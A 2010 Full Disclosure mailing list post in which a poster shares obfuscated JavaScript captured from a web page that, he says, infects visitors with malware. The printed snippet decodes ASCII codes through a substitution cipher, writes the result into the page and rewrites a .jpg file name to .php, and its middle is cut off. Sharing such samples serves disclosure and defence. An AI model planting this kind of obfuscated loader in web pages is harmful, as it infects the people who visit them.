Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Some nice code yust captured
From: Stephan Gerling <SGerling () RosenInspection net>
Date: Mon, 22 Feb 2010 15:12:26 +0100

Dear all,
I just get a information by a scared user about something strange on his computer.
I investigate and found this script.


----------------------from the index.html-------------------------------

#alert {
        z-index:1300;
        width:434px;
        height:332px;
        position:absolute;
        display:none;
        cursor:hand;
        background:url(/res/1/1/images/alert.gif);
}       </style>

        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <title></title>

        <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js";></script>
        <script type="text/javascript">
        var y2c2a2ff = 
["s","x","Z","f","B","U","X","J","W","N","c","C","O","G","T","I","P","S","D","h","F","k","Q","y","u","w","b","r","o","j","q","l","m","t","z","A","E","i","M","L","p","n","g","Y","e","V","R","v","H","a","d","K"],
 z2c2a2ff = 9;
        var dl_d7e9ccb94 = 'd_d7e9cc.jpg';

        var cc = 1, ee = 1;


        (function() {

                dl_d7e9ccb94 = dl_d7e9ccb94.replace(/\.jpg/, '.php');
                var temp="",i,pass2 = "",sou="";
                var x2c2a = "60)^$,78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,32)^$,103)^$,10
-----cut off------
seems like ascii codes
/-------cut off------
Continue of the script
78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,62)^$,";
                temp = x2c2a.split(")^$,");
                for (var i in temp) {
                        pass2 += String.fromCharCode(temp[i]);
                }

                pass2 = pass2.replace(/\&amp;/g,'&');
                pass2 = pass2.replace(/\&lt;/g,'<');
                pass2 = pass2.replace(/\&gt;/g,'>');
                pass2 = pass2.replace(/\&quot;/g,'"');

                var pass1 = "";
                temp = pass2.split("");
                for (var i in temp) {
                        sou += f2c2a2ff7f(temp[i]);
                }

                document.write(sou);

        })();

        function f2c2a2ff7f(s_in){
                var index = $.inArray(s_in, y2c2a2ff);
                if(index >= 0){
                        var new_index = (index - z2c2a2ff) < 0 ? y2c2a2ff.length - (z2c2a2ff - index) : index - 
z2c2a2ff;
                        return y2c2a2ff[new_index];
                }
                return s_in;
        }


        </script>
        <script type="text/javascript">
        (function($) {
            if ($.browser.mozilla) {
                $.fn.disableTextSelect = function() {
                    return this.each(function() {
                        $(this).css({
                            'MozUserSelect' : 'none'
                        });
                    });
                };
                $.fn.enableTextSelect = function() {
                    return this.each(function() {
                        $(this).css({
                            'MozUserSelect' : ''
                        });
                    });
                };
            } else if ($.browser.msie) {
                $.fn.disableTextSelect = function() {
                    return this.each(function() {
                        $(this).bind('selectstart.disableTextSelect', function() {
                            return false;
                        });
                    });
                };
                $.fn.enableTextSelect = function() {
                    return this.each(function() {
                        $(this).unbind('selectstart.disableTextSelect');
                    });
                };
            } else {
                $.fn.disableTextSelect = function() {
                    return this.each(function() {
                        $(this).bind('mousedown.disableTextSelect', function() {
                            return false;
                        });
                    });
                };
                $.fn.enableTextSelect = function() {
                    return this.each(function() {
                        $(this).unbind('mousedown.disableTextSelect');
                    });
                };
            }
        })(jQuery);
        </script>
        </head>
        <body>

        </body>
        </html>



If you open this webpage http : / / 217.23.5.205 / index.ht......
You will be infected with Virus/Malware: Cryp_Krap-9


Best regards,

Stephan Gerling


May the force be with you
-------------------------
Obi-Wan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Some nice code yust captured Stephan Gerling (Feb 22)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault